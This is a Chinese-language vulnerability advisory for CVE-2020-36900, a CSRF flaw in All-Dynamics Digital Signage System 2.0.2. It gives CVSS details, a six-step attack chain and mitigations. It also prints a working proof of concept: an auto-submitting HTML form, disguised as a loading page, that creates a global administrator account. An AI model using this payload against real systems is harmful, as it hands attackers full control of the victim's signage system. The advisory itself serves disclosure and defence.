IPBUF安全漏洞报告
English
CVE-2020-36900 CVSS 8.8 高危

CVE-2020-36900 All-Dynamics数字标牌系统CSRF漏洞可创建管理员账户

披露日期: 2025-12-10

漏洞信息

漏洞编号
CVE-2020-36900
漏洞类型
跨站请求伪造(CSRF)
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
All-Dynamics Digital Signage System

相关标签

CSRF跨站请求伪造All-Dynamics数字标牌系统用户管理权限提升CVE-2020-36900高危漏洞

漏洞概述

CVE-2020-36900是All-Dynamics Digital Signage System 2.0.2版本中的一个高危跨站请求伪造(CSRF)漏洞。该漏洞存在于系统的用户管理功能模块中,攻击者可以利用此漏洞在已登录用户不知情的情况下,通过构造恶意网页自动提交表单,创建具有全局管理员权限的新用户账户。All-Dynamics Digital Signage System是一款广泛应用于商业场所的数字标牌管理系统,用于远程控制和管理数字屏幕内容。由于该系统通常部署在企业内部网络中,攻击者一旦成功利用此漏洞创建管理员账户,即可获得对整个数字标牌系统的完全控制权,进而可能访问敏感信息、篡改展示内容或进行进一步的内网渗透攻击。此漏洞的CVSS评分高达8.8分,属于高危漏洞,需要尽快修复。

技术细节

该CSRF漏洞存在于All-Dynamics Digital Signage System的用户管理接口中,系统未能对用户管理相关的敏感操作实施有效的CSRF令牌验证机制。攻击者首先需要诱使已登录的管理员用户访问攻击者控制的恶意网页。该恶意页面包含一个自动提交的表单,表单内容为创建新管理员用户的请求。当受害者浏览器加载该页面时,JavaScript代码会自动触发表单提交,向目标系统发送POST请求。由于浏览器会自动携带受害者的会话Cookie,且系统未验证请求的来源合法性,攻击者可以成功以受害者的身份创建新的管理员账户。新创建的管理员账户具有完整的系统权限,包括用户管理、内容发布、设备控制等功能。攻击者利用获取的管理员凭证即可长期控制目标系统。漏洞的利用条件相对简单,不需要复杂的攻击准备,但需要一定的社会工程学手段来诱导受害者访问恶意页面。

攻击链分析

STEP 1
步骤1
攻击者创建包含恶意表单的HTML页面,表单内容为创建管理员用户的POST请求
STEP 2
步骤2
攻击者通过钓鱼邮件、社交工程等方式诱导已登录的管理员用户访问恶意页面
STEP 3
步骤3
受害者浏览器加载恶意页面后,JavaScript自动提交表单到目标系统的用户创建接口
STEP 4
步骤4
浏览器自动携带受害者的有效会话Cookie发送请求,系统未能验证请求来源合法性
STEP 5
步骤5
系统成功创建新的管理员账户,攻击者获得系统的完全控制权
STEP 6
步骤6
攻击者使用新创建的管理员凭证登录系统,进行进一步恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CSRF PoC for CVE-2020-36900 --> <!-- All-Dynamics Digital Signage System 2.0.2 - Create Admin User --> <!DOCTYPE html> <html> <head> <title>Page Loading...</title> </head> <body> <form action="http://target-server/api/user/create" method="POST" id="csrfForm"> <input type="hidden" name="username" value="malicious_admin"> <input type="hidden" name="password" value="P@ssw0rd123"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="role" value="administrator"> <input type="hidden" name="privileges" value="global"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the CSRF attack may have failed.</p> </body> </html>

影响范围

All-Dynamics Digital Signage System <= 2.0.2

防御指南

临时缓解措施
临时缓解措施:在Web应用防火墙上配置CSRF防护规则,拦截异常的跨站用户管理请求;限制管理接口的访问来源,仅允许从内网IP访问管理后台;监控用户创建日志,及时发现异常的管理员账户创建行为。建议在浏览器中启用CSRF保护插件,避免访问不可信的第三方网站。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表